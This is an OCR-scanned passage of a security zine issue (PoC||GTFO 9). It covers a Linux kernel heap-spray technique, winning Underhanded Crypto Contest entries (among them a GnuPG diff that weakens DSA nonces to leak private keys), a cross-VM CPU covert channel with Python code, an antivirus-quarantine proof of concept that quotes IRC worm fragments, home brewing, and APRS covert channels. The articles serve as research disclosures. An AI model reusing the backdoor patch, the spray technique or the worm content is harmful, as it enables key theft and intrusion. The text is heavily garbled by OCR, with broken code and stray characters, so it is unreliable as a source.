To overcome this limitation and to control more of the kernel memory (zone GFP_ USER) state, we came 





up with a somewhat more comprehensive solution presented at Confidence 2015.19 
To understand this technique, we will need to take a closer look at the splice method. 





l|ssize t default file splice read(struct file xin, loff t *ppos, 


struct pipe inode info *pipe, size t len, 
unsigned int flags) 


unsigned int nr pages; 


15SPLICE When Something is Overflowing by Peter Hlavaty, Confidence 2015 
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unsigned int nr freed; 





size t offset; 
struct page *pages|PIPE DEF BUFFERS] ; 
/ f · 

struct splice pipe desc spd = { 
.pages — pages, 
.partial = partial, 
.nr pages max = PIPE DEF BUFFERS, 
.flags = flags, 
.ops = &default pipe buf ops, 
.Spd release = spd release page, 

}; 

for (i = 0; i < nr pages & i < spd.nr pages шах & len; i++) 1 
struct расе «расе; 


page = аПос раве (СЕР USER); 





As you can see from this highlight, the important page is alloc page(GFP. USER), which is allocated for 
PAGE. SIZE and filled with controlled content later. This is nice, but we still have a limit on pipes! 

Now here is a paradox: sometimes randomization can play in your hands! 

And that's our case... In other words, when you do splice multiple (really a lot of) times, you will cover 
a lot of random pages in kernel's virtual address space. But that's exactly what we want! 

But to trigger default file splice read you need to provide the appropriate pipe counterpart to 
splice, and one of the kosher candidates is /dev/ptmx a.k.a. T'TY. And as splice is for moving content 
around, you will need to perform a few steps to achieve a successful spray algorithm: 


no memory pressure! 


* allow spray with only Ox1fd pipes! 


[| 
El controlled data 1 

TTY - master pipe - out 
d controlled data 1 


controlled data 3 /\ 
+ 
КА 
КА 
КА 
+ 
+ 
+ Q 
+ 
+ 
КА 
КА 
КА 
50: 
КА 
КА 
КА 
КА 
КА 
КА 
КА 
КА 
+ 
Vo V 
| 


экпе! mode 
Kernei mode 


| [0 | BUFFER in К 
Iz] controlled data 1 


[zl controlled data 1 
El controlled data 3 





You will need to (1) fill tty slave; (2) splice tty master to pipe in; (3) read it out from pipe out; and (4) go 
back to (1). 

In conclusion, we consider kmalloc, with per-byte-controlled content, and kfree controllable by user to 
that extent very damaging for overall kernel security and introduced mitigations. And we believe that this 
power will be someday stripped from the user, therefore making harder exploitation of otherwise difficult to 
exploit vulnerabilities. 

By the way, in this article we do not discuss kernel memory control by ret2dir technique.!? For additional 
info and practical usage check our (Qantlr7 of @K33nTeam) research from BHUS15!7 


16 ret2dir: Rethinking Kernel Isolation by Kemerlis, Polychronakis, and Keromytis 
17 Universal Android Rooting is Back! by Wen Xu, BHUSA 2015 
unzip pocorgtfo09.pdf bhusal5wenxu. pdf 
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5 Second Underhanded Crypto Contest 


Defcon 23's Crypto and Privacy Village mini- 
contest is over. Despite the tight deadline, we re- 
ceived five high-quality submissions in two cate- 
gories. The first was to patch GnuPG to leak the 
private key in a message. The second was to back- 
door a password authentication system, so that a 
secret value known to an attacker could be used in 
place of the correct password. 


GnuPG Backdoor 


We had three submissions to the GnuPG category. 
The winner is Joseph Birr-Pixton. The submission 
takes advantage of how GnuPG 1.4 generates DSA 
nonces. 

The randomness of the DSA nonce is crucial. 
If the nonce is not chosen randomly, or has low 
entropy, then it is possible to recover the private 
key from digital signatures. GnuPG 1.4 generates 
nonces by first generating a random integer, set- 
ting the most-significant bit, and then checking if 
the value is less than a number Q (a requirement of 
DSA). If it is not, then the most-significant 32 bits 
are randomly generated again, leaving the rest the 
same. 

This shortcut enables the backdoor. The patch 
looks like an improvement to GnuPG, to make it 
zero the nonce after it is no longer needed. Unfor- 
tunately for GnuPG, but fortunately for this con- 
test, there's an extra call to memset() that zeroes 
the nonce in the “greater than ©)” case, meaning the 
nonce that actually gets used will only have 32 bits 
of entropy. The attacker can fire up some EC2 in- 
stances to brute force it and recover the private key. 


9.1 





diff — git a/cipher/dsa.c b/cipher/dsa.c 


index e23f05c..e496d69 100644 
—— a/cipher/dsa.c 

++ b/cipher/dsa.c 

ад —93,6 +93,7 aa gen k( MPI q ) 


if( !rndbuf || nbits < 32 ) { 
— if (rndbuf) memset(rndbuf, 0, nbytes); 
xfree(rndbuf); 
rndbuf = get random bits(nbits, 1, 1); 


} 
@@ —115,15 +116,18 @@ gen k( MPI q ) 


if( !(mpi emp( k, q ) « 0) ) ( //k«q 
if( DBG CIPHER ) 


18unzip pocorgtfo09.pdf uhc-subs.tar.xz 
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by Taylor Hornby 


progress( 4-7); 
memset ( rndbuf , 
continue; /* по 


0, nbytes); 


*/ 


) 
if( !(mpi cmp ш( К, 0 ) > 0) )( //k»0 
if( DBG CIPHER 
progress(’—’) 
memset (rndbuf , 
continue; //no 


) 
0, nbytes); 


) 
break; //okay 


0, nbytes); 


memset (rndbuf , 
х Ёгее (rndbuf) ; 
if(DBG CIPHER) 

progress(’\n’); 





5.2 Backdoored Password Authenti- 
cation 


There were two entries to the password authenti- 
cation category. The winner is Scott Arciszewski. 
This submission pretends to be a solution to a user 
enumeration side channel in a web login form. The 
problem is that if the username doesn’t exist, the lo- 
gin will fail fast. If the username does exist, but the 
password is wrong, the password check will take a 
long time, and the login will fail slow. This way, an 
attacker can check if a username exists by measuring 
the response time. 

The fix is to, in the username-does-not-exist 
case, check the password against the hash of a ran- 
dom garbage value. The garbage value is gener- 
ated using rand (), а random number generator that 
is not cryptographically secure. Some rand() out- 
put is also exposed to the attacker through cache- 
busting URLs and CSRF tokens. With that output, 
the attacker can recover the internal rand() state, 
predict the garbage value, and use it in place of the 
password. 


An archive with all of the entries is included 
within this PDF.!? The judge for this competition 
was Jean-Philippe Aumasson, to whom we extend 
our sincerest thanks. 
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Exploiting Out-of-Order-Execution; or, 


Processor Side Channels to Enable Cross VM Code Execution 


by Sophia D'Antoine 


In which Sophia uses the MFENCE instruction on virtual machines, 
just as Joshua used trumpets on the walls of Jericho. —PML 


At REcon 2015, I demonstrated а new hard- 
ware side channel that targeted co-located virtual 
machines in the cloud. This attack exploited the 
CPU’s pipeline as opposed to cache tiers, which are 
often used in side channel attacks. When design- 
ing or looking for hardware-based side channels— 
specifically in the cloud, I analyzed a few universal 
properties that define the “right” kind of vulnerable 
system as well as unique ones tailored to the hard- 
ware medium. 

The relevance of these types of attacks will only 
increase—especially attacks that target the vulnera- 
bilities inherent to systems that share hardware re- 
sources, such as in cloud platforms. 





L1 Cache L1 Cache L1 Cache 
L2 Cache L2 Cache L2 Cache 





Figure 1: Virtualization of physical resources 


6.1 What is a Side Channel Attack? 


Basically а side channel is a way for any meaning- 
ful information to be leaked from the environment 
running the target application, or in this case the 
victim virtual machine (as in Figure 6). In this case, 
a process (the attacker) must be able to repeatedly 
record this environment “artifact” from inside one 
virtual machine. 
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In the cloud, this environment is the shared 
physical resources on the service used by the vir- 
tual machines. The hypervisor dynamically parti- 
tions each physical resource—which is then seen by 
a single virtual machine as its own private resource. 
The side channel model in Figure 6.1 illustrates this. 

Knowing this, the attacker can affect that re- 
source partition in a recordable way, such as by 
flushing a line in the cache tier, waiting until the vic- 
tim process uses it for an operation, then requesting 
that address again—recording what values are now 
there. 







victim: 
leaves 
artifacts 


adversary: 
records 
artifacts 


Figure 2: Side channel model 


What Good is a Side Channel At- 
tack? 


6.2 


Great! So we can record things from our victim's 
environment—but now what? Of course, some kinds 
of information are better than others; here is an 
overview of the different kinds of attacks people have 
considered, depending on what the victim's process 
is doing. 

Crypto key theft. Crypto keys are great, pri- 
vate crypto keys are even better. Using this hard- 
ware side channel, it's possible to leak the bytes of 
the private key used by a co-located process. In 
one scenario, two virtual machines are allocated the 
same space in the L3 cache at different times. The 
attacker flushes a certain cache address, waits for the 


victim to use that address, then queries it again— 
recording the new values that are there.|1| 

Process monitoring. What applications is the 
victim running? It will be possible for find out when 
you record enough of the target's behavior, i.e., its 
CPU or pipeline usage or values stored in memory. 
Then а mapping between the recording to a spe- 
cific running process could be constructed—up to 
some varied degree of certainty. Warning, this does 
rely on at least a rudimentary knowledge of machine 
learning. 





Environment keying. This attack is handy for 
proving co-location. Using the environment record- 
ings taken off of a specific hardware resource, you 
can also uniquely identify one server from another 
in the cloud. This is useful to prove that two virtual 
machines you control are co-resident on the same 
physical server. Alternatively, if you know the be- 
havior signature of a server your target is on, you 
can repeatedly create virtual machines in the tar- 
geted cloud, recording the behavior on each system 
until you find a match.|2] 

Broadcast signal. This attack is а nifty way 
of receiving messages without access to the Internet. 
If а colluding process is purposefully generating be- 
havior on a pre-arranged hardware resource, such 
as purposefully filling a cache line with 0’s and 1°, 
the attacker (your process) can record this behav- 
ior in the same way it would record a victim's be- 
havior. You then can translate the recorded values 
into pre-agreed messages. Recording from different 
hardware mediums results in а channel with differ- 
ent bandwidths.|3| 


6.3 The Cache is Easy; 
the Pipeline is Harder 


Now all of the above examples used the cache to 
record the environment shared by both victim and 
attacker processes. It is the most widely used re- 
source in both literature and practice for construct- 
ing side channels, as well as the easiest one to record 
artifacts from. Basically, everyone loves cache. 
However, the cache isn't the only shared re- 
source. Co-located virtual machines also share the 
CPU execution pipeline, as illustrated in Figure 3. 
In order to use the CPU pipeline, we must be able 
to record a value from it. Unfortunately, there is no 
easy way for any process to query the state of the 
pipeline over time—it is like а virtual black-box. 
The only thing а process can know is the instruc- 
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tion set order it gives to be executed on the pipeline 
and the result the pipeline returns. This is the infor- 
mation source we will mine for a number of effects 
and artifacts, as follows. 


Out of order execution: a pipeline's arti- 
fact. We can exploit this pipeline optimization as 
a means to record the state of the pipeline. The 
known input instruction order will result in two dif- 
ferent return values—one is the expected result(s), 
the other is the result if the pipeline executes them 


out-of-order. 


Processor01 








a xe 


Figure 3: Foreign processes can share the same 
pipeline 


SMT 

Allows 
Threads to 
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Strong memory ordering. Our target, 
cloud processors, can be assumed to be x86/64 
architecture—implying a usually strongly-ordered 
memory model.|4| This is important, because the 
pipeline will optimize the execution of instructions, 
but will attempt to maintain the right order of stores 
to memory and loads from memory. 





However, the stores and loads from different 
threads may be reordered by out-of-order-execution. 
Now, this reordering is observable if we're clever 
enough. 








Recording instruction reorder (or, how to 
be clever). In order for the attacker to record 
these reordering artifacts from the pipeline, we must 
record two things for each of our two threads: input 
instruction order and return value. 





Additionally, the instructions in each thread 
must contain a STORE to memory and a LOAD from 
memory. The LOAD from memory must reference the 
location stored to by the opposite thread. This setup 
ensures the possibility for the four cases illustrated 
in Figure 4. The last is the artifact we record; do- 
ing so several thousand times gives us averages over 
time. 





THREAD 1 THREAD 2 
$упсһеа store [X], 1 store [Y], 1 
—>|п1-2-1_ 
load r1, [Y] load r2, [X] 
ASynched store [X], 1 
load r1, [Y] store [Y], 1|I—»|r120 r2 = 1 
load r2, [X] 
Outof g |load r1. [Y1] | | load r2, Dd А 
m g I 
Execution | store [X], 1 | | store [Y], 1 ' 
| кете rer аы ша L| 


Figure 4: The attacker can record when its instruc- 
tions are reordered 





Sending a message. То make our attacks more 
interesting, we want to be able to force the amount 
of recorded out-of-order-executions. This ability is 
useful for other attacks, such as constructing covert 
communication channels. 

In order to do this, we need to alter how the 
pipeline optimization works—by increasing the prob- 
ability that it either will or will not reorder our two 
threads. The easiest is to enforce a strong memory 
order and guarantee that the attacker will receive 
fewer out-of-order-executions. This is where mem- 
ory barriers come in. 

Memory barriers. In the x86 instruction set, 


References 





there are specific barrier instructions that stop the 
processor from reordering the four possible combina- 
tions of STORE's and LOAD's. What we're interested 
in is forcing а strong order when the processor en- 
counters an instruction set with a STORE followed by 
a LOAD. The MFENCE instruction does exactly this. 

By getting the colluding process to inject these 
memory barriers into the pipeline, the attacker en- 
sures that the instructions will not be reordered, 
forcing a noticeable decrease in the recorded aver- 
ages. Doing this in distinct time frames allows us to 
send a binary message, as shown in Figure 5. More 
details are available in my thesis.!? 








THE PIPELINE 


Figure 5: MFENCE ensures the strong memory order 
on pipeline 


The takeaway is that—even with virtualization 
separating your virtual machine from the hundreds 
of other alien virtual machines!—the pipeline can't 
distinguish your process's instructions from all the 
other ones, and we can use that to our advantage. 
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from time import те, з1еер 
import os 


# takes a binary string as input 


l?unzip pocorgtfo09.pdf crossvm.pdf 
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13| def send (Message, roundLength): 
for x in Message: 





15 # Run a single busy loop to represent a 0 
Ii == (уту 
17 print(’sending’, x) 
# change the time of this busy loop to match receiver round length 
19 start time — time() 
end time = time() + roundLength 7115 number is loop time in seconds 
21 while( start time < end time): 
start time = time() #do nothing 
23 else: 
# send a "hi? bit in а given time frame 
25 # by reducing the received out of order executions 
# this is done using the sender exe 
27 print(’sending’, x) 
start time = time() 
29 end time = time() + roundLength 
while( start time < end time): 
31 os.system("C: V V CPUSender. exe") 
# do nothing until sending c process terminates 
33 start time = time() 
35 
def main(): 
37 # measured receiver time frame length in seconds — (for ome bit) 
roundLength — 1.08 
39 message = '' 
41 # enter binary string 
while( message |= ’exit’): 
43 message = raw input('Enter Binary String: ') 
start t — time() 
45 if( message |= "exit ’): 
send (message , roundLength ) 
47 print "\nTotal execution time: " 
print time() — start t 
49 
if | name == " man  ": 
51 main () 





3| RECEIVER 
зорћља.те 
5| 07/06/15 


9|from time import time,sleep 
import os 

11| import sys, subprocess 
import msvcrt as m 

13| import matplotlib 
import matplotlib.pyplot as plt 


15 
def main(): 
17 
while True: 
19 start time — time() 
end time = time() + 12 
21 print "Receiving Bits in Words (8 bit blocks)....\n" 
28 # records out of order executions and writes averages to file 
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р = subprocess.Popen("C:/ Receiver.exe " 


while start time < end time: 
start time — time() 
print time() 


# wait because of system latency 


1 "ж*8) 


p = subprocess.Popen("C:/nop. exe") 
p = subprocess.Popen("C: / пор. exe") 


# read all recorded out of order executions from file 
f = open("C:/Python27/BackupCheck. txt") 
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txt = f.readlines() 
f.close() 
txt = txt [0] 
print "Received Bits\n" 
print txt 
# trigger a picture to appear 
bits: = txts plit ("a") 
if "11" in bits [0]: 
print "\п [+] trigger detected 
exe = "C:/Users/root /Downloads/JPEGView 1 0 29/ЈРЕСМлеу. exe" 
args "1027 ples!“ 
p = subprocess.call([exe,args]) 
sys.exit(0) 
quit () 
else: 
print "\n [+] trigger not detected" 
# plot received out of order executions to view step 
print "\n\nEnter to Plot...." 
р. kill() 
m. getch () 
# plot recorded OoOE step signal to png file 
with open("BackupCheck2.txt") as f: 
data = f.read() 
data = data.split("\n") 
у = [float(x) for x in data[O].split (^ ')[:—1]] 
x = list (xrange(len(y))) 
print "There are ", len(y), " elements to plot." 
fig = plt.figure() 
axl = fig.add subplot(111) 
axl.set title("Plot Received OoOE") 
axl.set xlabel("iterations") 
axl.set ylabel("out—of—order—execution averages") 
axl.fill between(x,y,color=’ yellow’ ) 
axl.plot(x,y, marker=’.’ ,lw=1,label=’the data’, alpha=0.3) 
leg = axl. legend () 
plt.savefig('plot.png', bbox_inches=’ tight ’) 
# repeat 
print "\n\nEnter to Continue...." 
m. getch () 
if name == " main  ": 
main () 
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7 Antivirus Tumors 


McAfee Enterprise VirusScan (not the home version 
of their AV) has a peculiar way of quarantining mal- 
ware. If an anti-virus product wants to keep a foren- 
sic copy of removed malware, it must either move it 
to an area of the system that it doesn't scan, or 
it must somehow transform this malware data so it 
can no longer be seen by the anti-virus signature. 
VirusScan is almost able to get away with the sec- 
ond option. Almost. 





A VirusScan quarantine file (.bup) is an odd 
form of an archive format called Compound File Bi- 
nary Format that can usually be read by 7zip. This 
file contains two files. One of them is a file that con- 
tains metadata on the original malware. The other 
file is the malware file that was removed. Both of 
these files have been XOR encoded with a one byte 
key of Охба (ASCII ‘j’). This 7zip file is archive 
mode only, so it has no compression. All of this is 
extremely useful. 


Let's say that hypothetically all ‘X’ characters 
look like malware to our AV. (This is a bit contrived, 
but we'll get back to a real example soon.) This X 
is Ox58 or 0b01011000. To bitwise XOR this char 
with Ox6A would give us ‘2’ (0x32 or 0100110010). 
So our PoC would be ‘X2’ for a signature that looked 
for ‘X’. Why? Our tumor has the contents of ‘X2’, 
and since that contains ‘Х’, it's bad malware and 
needs to be quarantined. The file gets XORed to 
become '2X' and archived with the metadata. If you 
did a hexdump on this forensic .bup file, the con- 


0000000: 
0000010: 
0000020: 
0000030: 
0000040: 
0000050: 
0000060: 
0000070: 
0000080: 
0000090: 
00000 a0 : 
00000Ъ0: 
00000 c0: 
0000040: 
00000 e0 : 


by Eric Davisson 


tents of ‘2X’ are still visibly malicious and need to 
be quarantined! 

I neither have nor want access to McAfee's sig- 
natures, but we all have access to ClamAV's set of 
signatures. It is possible (and highly verified) that 
there is some signature overlap, as files can come 
up dirty on multiple vendors' scans. In this PoC, 
I will use ClamAV's “Worm.VBS.IRC.Alba (Clam)" 
signature. Despite the name, I assure you that if 
you submit the file through McAfee, it scans dirty. 

The following script extracts a plaintext Clam 
signature database, parses out the data of our sig- 
nature, and writes the original and XOR’d form of 
this signature to a file called tumor. This assumes 
you're on а Linux system with ClamAV installed 
with signatures loaded in /var/lib/clamav/. 


dd if=/var/lib/clamav/main.cvd of=hivs.tar \ 
bs=512 skip=1 2» /dev/null; 

tar —x main.db —f hivs.tar 2» /dev/null; 

chmod 666 main.db; 

rm hivs.tar; 

grep "IRC.Alba" main.db 


| grep —о "|0—9a—f|\+\$" 
| хха —r -р | perl —0777 —e 
"bi 4535 print. ek; 

print ($k ^ ("j" x length($k))) ;? 
> tumor; 

rn main.db 





This tumor is benign, as its growth eventually 
stops after a few rounds, and I've not yet been able 


ript | ’+Char($D)+ 
Сћаг (ЗА) +.. ’n0=o 
n 1:JOIN:#: if ( 
$me !— $nick )’ 
..’{ /асс send $ 
nick с: \ mirc дом 
nload\alba.exe } 
+С....ТМА)...ВМ 


.CA) ... BNHCAg'M. 
ZW..J[P %#$PIPJ. 
.JBJN ..JKWJN.... 
JCMg'M. JE... J... 





to compose a proof of concept of a malignant tumor, 
one that eventually fills the hard disk. Through ex- 
perimentation, I suspect that McAfee signatures are 
more complex than string matches. For example, 
when McAfee pulls out of my pool a file that previ- 
ously had no nulls but now does, it often no longer 


>>> : 


E 


VS 


sees it as malware and rejoices. This is а problem 
as Tzip introduces nulls in its metadata. Also some 
malicious data no longer triggers the antivirus when 
pushed deeper into the file. These barriers may be 
bypassed by more intimate knowledge of the McAfee 
signatures. 





а rm agar 


ИП ТЕРАСЕ 





INTERFACE AGE 


BACK ISSUES 


Available in Limited Quantities 


Vol. 1, Issue 5, APRIL 1976 

Vol. 1, Issue 6, MAY 1976 * 

Vol. 1, Issue 9, AUGUST 1976 

Vol. 1, Issue 11, OCTOBER 1976 
Vol. 1, Issue 12, NOVEMBER 1976 
Vol. 2, Issue 1, DECEMBER 1976 * 
Vol. 2, Issue 2, JANUARY 1977 


*Limited 


INTERFACE AGE Magazine 


Name(rrint) _ | | $3 Address 


Please send me: 


Dept. BI - Р.О. Box 1234, Cerritos, CA 90701 


Vol. 2, Issue 3, FEBRUARY 1977 


Vol. 2, Issue 5, APRIL 1977 


Vol. 2, Issue 4, MARCH 1977 
Vol. 2, Issue 6, MAY 1977 


Vol. 2, Issue 7, JUNE 1977 


Vol. 2, Issue 8, JULY 1977 


City State 








JANUARY 1976 
FEBRUARY 1977 





AUGUST 1976 
OCTOBER 1976 








*Price includes 50€ for postage and handling. 
**Available in very limited quantities. 


IS. 


SREZ 
ти 


О сша + 


Pai naja EIE SKE 











MAY 1977 
JUNE 1977 














————— l——— = = СО E PE pg =ч ыа ГЕР ей 
You may photocopy this page if you wish to keep your INTERFACE AGE intact. Please allow six weeks for delivery. 


27 


Sig. 





8 Brewing TCP/IPA; or, 


A Useful Skill for the Zombie Apocalypse 


Hacking is a broad term that has too many nega- 
tive and positive connotations to list. But whichever 
connotations you prefer, it is a skillset, and a skill is 
all about things or services that can be exchanged 
for currency or bartered for goods. While this fine 
journal excels in sharing scattered bits of useful 
hacking knowledge, the vast majority of publica- 
tions repeat ad nauseam the same drivel of the cy- 
ber world. But when the zombies come—and they 
will come!—what good are your SQL injections for 
survival? How will you exchange malware for fresh 
vegetables and clean drinking water? What practi- 
cal skills do you have that can enable your survival? 

What hacking shares with making is their com- 
mon ground of curiosity, skill, and patience—and 
these intersect on à product that is universally rec- 
ognized, suitable for barter, and damn tasty. Of 
course, beer as we know it today differs from the an- 
cient times, where it was a part of the daily diet of 
Egyptian Pharaohs and Greek Philosophers through 
the ages. Today's beer and its varieties have ac- 
quired a broader tradition, each with a unique back- 
ground and tastes. But in that variety there is 
a center, one that pulls together people from all 
races, cultures, and economic statuses. Modern day 
philosophers and preachers discuss the world's chal- 
lenges over beer. Business deals and other relation- 
ships are solidified at the bar, by liquid camaraderie! 

Why do I bloviate on all of this? Because there 
comes a time in every hacker's life when you wish 
for more, when you wish to create something of in- 
trinsic value rather than endlessly find faults in the 
works of others. For me, that was turning grain, 
water, hops, and yeast into something greater than 
the sum of its parts. It's an avenue to share, to serve 
others, to create. 





(It's also something to trade for milk and bread 
when the zombies come!) 


8.1 Ingredients 


Beer, like most things in life, can be as simple or as 
complex as the reader wishes it to be. But at its 
core, this beverage started with four primary ingre- 
dients, each just as important as the next: grain, 
water, hops, and yeast. 
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by Ron Fabela of Binary Brew Works 
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Grain Or even more generally, any cereal where 
its grain can be cultivated and finally sugars can be 
extracted. But more than just simple grain, grain 
that has undergone the malting process. Grains are 
made to germinate by soaking in water, and are then 
halted from germinating further by drying with hot 
air, as shown in Figure 1. By malting grains, the en- 
zymes are developed that are required for modifying 
the grains starches into sugars. This is important 
to know, as not just any grain will do for the beer 
brewing process. These sugars extracted from the 





malted grains will eventually be turned to alcohol 
during fermentation, as in Figure 2. 


Water  Arguably the most critical component, wa- 
ter makes up 9576 of the final product and can con- 
tribute as much to the taste and feel of the brew 
as do the grains, hops, and yeast. Books have been 
written and rewritten on the subject of brewing wa- 
ter and will not be rehashed here. The key water 
properties are: clean, chlorine free, and plentiful. 


Hops Starting in the 9th century, brewers began 
using hops in place of bittering herbs and flowers as 
a way to flavor and stabilize their brew. Hops are the 
female flowers of the hop plant with training bines 
that set forth like ivy or grapes. The hop cone itself 
is made of multiple components, but most important 
to brewing are the resins that are composed of al- 
pha and beta acids. Alpha acids in particular are 
critical due to their mild antibiotic/bacteriostatic 
effect that favors the exclusive activity of brewing 
yeast over microbial nasties swimming about. See 
Figure 3. 
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Beta acids contribute to the beer's aroma and 
overall flavor. These acids are extracting during the 
brewing process via boiling, which will be expanded 
upon in the following sections. 


20git clone https://github.com/BinaryBrewWorks/Beer/ 
unzip pocorgtfo09.pdf beer.zip 
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Yeast Single-celled organisms with an amazing 
ability to convert carbohydrates (sugars) into СО» 
and alcohol, yeast is the literal lifeblood of beer, 
as fermentation changes sugary and otherwise bor- 
ing sugar water (wort, or young beer) into glorious 
brew. 

For brewing there are 2 main types of yeasts: 
^top-cropping" where the yeast forms a foam at 
the top of the wort during fermentation and is 
more commonly known as “ale yeast" and “bottom- 
cropping" where the yeasts ferment at lower temper- 
atures and settle at the bottom of the vessel during 
fermentation, commonly known as “lager yeast." 





Yeast can be cultivated from the wild or 
known/safe sources. Yeast can even be collected and 
nurtured from bottle-conditioned brews (Belgian va- 
rieties in particular). 


8.2 Brewing Process 


The brewing process is often 15 minutes of frantic 
activity followed by 60 minutes of drinking, cleaning, 
or otherwise conversing with your neighbor. Sim- 
plistically, the steps are: extract fermentable sugars 
from the malted grains with hot water (mashing); 
boil and reduce the fermentable sugar water (wort) 
while adding hops at specific timing intervals; re- 
duce the wort to a safe temperature and move to a 
fermentation vessel; pitch yeast and store at a con- 
sistent temperature, allowing the fermentation pro- 
cess to occur; pack and condition the beer for future 
consumption and enjoyment. 





There is much science and wizardry that takes 
place in these five steps. I would like to take you 
through this process with one of our own recipes at 
Binary Brew Works. These days you can't have a 
brewery without an India Pale Ale (IPA), a beer that 
at its origin was heavily hopped to make the journey 
by ship from England to India. This heavy-handed 
hop addition creates a highly bitter, but hopefully 
aromatic and balanced brew that is popular today. 





Gathering the Ingredients For our IPA, appro- 
priately named TCP/IPa, the following ingredients 
are used and scaled for a 30 gallon (114 liter) batch. 
Scaling at this volume is 1:1; so halving the num- 
bers for a 15 gallon (57 liter) batch will yield similar 
results.?9 


ТСР/1Ра 
FERMENTABLES: 


2Row 

Caramel Malt 60L 
Flaked Wheat 
HOPS: 


Cascade 
Citra 


Yeast: 


Wyeast 1056 


Preparing the Mash Water In a brewing ket- 
tle of your choosing, bring the appropriate amount 
of water to what is known as strike temperature. 
The volume of water needed depends on other pa- 
rameters such as grain absorption rates, equipment 
losses, and evaporation. As such, using a brewing 
water calculator is recommended. For this recipe, 
approximately 45 gallons (170 liters) of strike water 
is needed to get the desired 30 gallons (114 liters) 
of finished product. Your striking temperature is 
typically 10-15?F (5-7?C) higher than your target 
mash temperature. (In this case, 170?F (77°С) for 
a target 160°F (71?C).) 


Mashing In а separate vessel called a mash tun, 
the prepared grains are waiting for inclusion of the 
strike water. The mash tun is often a modified cooler 
or other insulated vessel that can contain the volume 
of both the grain and the striking water. In single in- 
fusion mashing, water is added to the grains, stirred, 
and typically left to sit for 60 minutes to allow for 
the extraction of fermentable sugars. 15 minutes 
of frantic moving of water, stirring, and cleaning is 
then followed by 60 minutes of drinking your last 
batch of beer. 





Boiling Once the mashing is complete, the sugar 
water or “wort” has to be extracted and placed into 
the boiling kittling (oftentimes the same kettle used 
to heat the strike water). This can be accomplished 
in a number of ways, mostly through the use of mesh 
false bottoms or other straining mechanisms to pre- 
vent, as much as possible, solid grain matter from 
entering the boiling kettle. 
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Once extracted, the wort is brought to a boil and 
held there for 60-90 minutes. The addition of hops 
through the boiling process adds to the bitterness 
and flavor of the beer, so it is critical to follow hop 
addition timings as this has a huge effect on the fi- 
nal product. For TCP/IPa, two hop additions are 
used. Cascade hops are widely used in the industry 
and therefore readily available to the brewer. Cas- 
cade hops provide the bittering required for an ТРА 
while imparting the characteristic spicy and citrus 
flavor expected for the style. Citra hops are added 
towards the end of the boil to add the strong citrus 
and tropical tones of flavor and aroma. Remember, 
the earlier the hop addition, the more bittering oils 
are extracted from the hop. Later additions provide 
more flavor and aroma without adding bitterness. 
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Cooling You now have a boiling pot of wort that 
must be cooled down to pitching temperature as 
quickly as possible. This is the most critical stage of 
the process! At 212°F (100°C), all types of nasties 
that can ruin your beer are boiled away. But as the 
wort is cooled, there is an increased risk of bacteria 
or other infections. Cleanliness of the brewery and 
its equipment is key from this point forward. 
Cooling can be accomplished by a number of 
heat transfer methods. At smaller volumes, coiled 


copper tubes shown in Figure 4 are submerged into 
the boiling wort to sanitize, and the cold water is 
passed through, cooling the wort to the target tem- 
perature. At larger volumes, heat transfer equip- 
ment gets bigger and beefier, but serves the same 
purpose. Most ale yeast pitches at a temperature 
between 70 and 75 degrees Fahrenheit (22°С). 


Fermentation Yeast are beautiful little crea- 
tures. Through a metabolic process, yeast convert 
sugars into gas (СО») and alcohol. This process 
must take place in а sanitary vessel where no in- 
terference from other microbes can ruin our wort. 
Temperature control of the vessel and the surround- 
ing room is critical to the overall taste and feel of the 
final product. Some styles, such as the saison, are 
purposefully fermented at the highest temperatures 
(80-85°Е, 27-29?F) allowed by the yeast. Fermen- 
tation at this temperature produces a “spicy” profile. 

For lagers, yeast ferment at lower temperatures 
common to basements and cellars and produce a 
funky flavor. Not my preference, but fun nonethe- 
less if you have the equipment or climate to ferment 
at this temperature. 

And like magic, our sugary wort is churned, 
eaten, and converted into glorious beer. 








Packaging Once the fermentation process is 
nearly complete, the beer can be stored and chilled. 
Carbonation comes next, with various methods 
available to the home brewer. Bottle conditioning 
is the process of introducing a priming sugar back 
into the wort just prior to bottling. Take careful 


notes and measurements at this point, as too much 
sugar can create explosive *bottle bombs." 

Investing in à used kegging system can help 
tremendously. Not only does this simplify cleaning, 
it also allows the brewer to force carbonate the keg. 
Attaching a CO» tank and selecting the appropri- 
ate PSI level can quickly and more evenly carbonate 
your brew to the target levels. Plus there's nothing 
like having fresh, cold beer on tap. 





Creating a final product from raw ingredients is 
a very fulfilling process. The basic process of ex- 
tracting sugars from grain, adding hops, fermenta- 
tion, and drinking is just the surface of а complex, 
diverse, and creative industry. For the homebrewer, 
not only serves as a way to make and enjoy beer, but 
also as a social tradition where drinks and conversa- 
tions are had over a boiling pot of wort. Go forth, 
become a brewer, and enjoy the miracle of your own 
beer! 
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9 Shenanigans with APRS апа AX.25 for Covert Communications 


by Vogelfrei 


This little document details some shenanigans involving APRS and its underlying AX.25 protocol, in- 
cluding but not limited to covert channels, steganography, avoiding detection by normal users and leveraging 
Internet infrastructure for worldwide covert communication. 

Covert channels in radio packet protocols have been investigated in the past.?! Although the regulations 
for amateur radio operation explicitly forbid hiding, encoding, or encrypting communications in any form, 
it is nonetheless a challenging and fruitful field for experimentation. 

I had been researching the topic for a while, and informally mentioned this to my neighbors Travis 
and Muur, who—it turned out—had been working on PSK31. They requested an article to follow theirs, 
PoC||GTFO 8:4. So enjoy this short piece, and look out for more elaborate tricks and tools for all your 
booklegging communication needs, because the world is almost through!?? 

The APRS protocol (Automatic Position Reporting System), originally developed by Bob Bruninga 
(WB4APR), has its roots in the necessity to track the position and telemetry data of vehicles, weather 
stations, and hikers. 

APRS is built on the AX.25 protocol, an amateur variant of the commercial X.25 protocol you'll fondly 
remember from Phrack 45:8. Despite the amateur nature of its deployment, there is an impressively large 
infrastructure of Internet gateways, digipeaters, weather stations, and other kinds of nodes. The International 
Space Station (ISS) itself has an APRS-capable digipeater on-board, and radio operators across the globe 
engage in packet radio messaging through the station and other satellites. 

Perhaps the most interesting feature of APRS, besides the fact that it supports exchanging all kinds 
of information, is the way the data is routed between uncoordinated nodes over large areas. It is this 
decentralized, connection-less nature that makes APRS ideal for covert communication purposes. 





9.0.1 Frequencies and Equipment 


Now that you have a general idea of what APRS is and what it might be useful for, you should know which 
frequencies are designated for APRS transmissions. Frequencies vary by country, but as а general rule, North 
America uses 144.390 MHz while Europe and Africa use 144.800 MHz. 

For testing and experimentation purposes, start with a cheap hand-held radio such as the Baofeng UV5R 
from China. It is capable of transmitting in the 2m and 70cm bands, and can easily be connected to your 
computer's sound card. This will allow you to immediately test software modems and get your feet wet with 
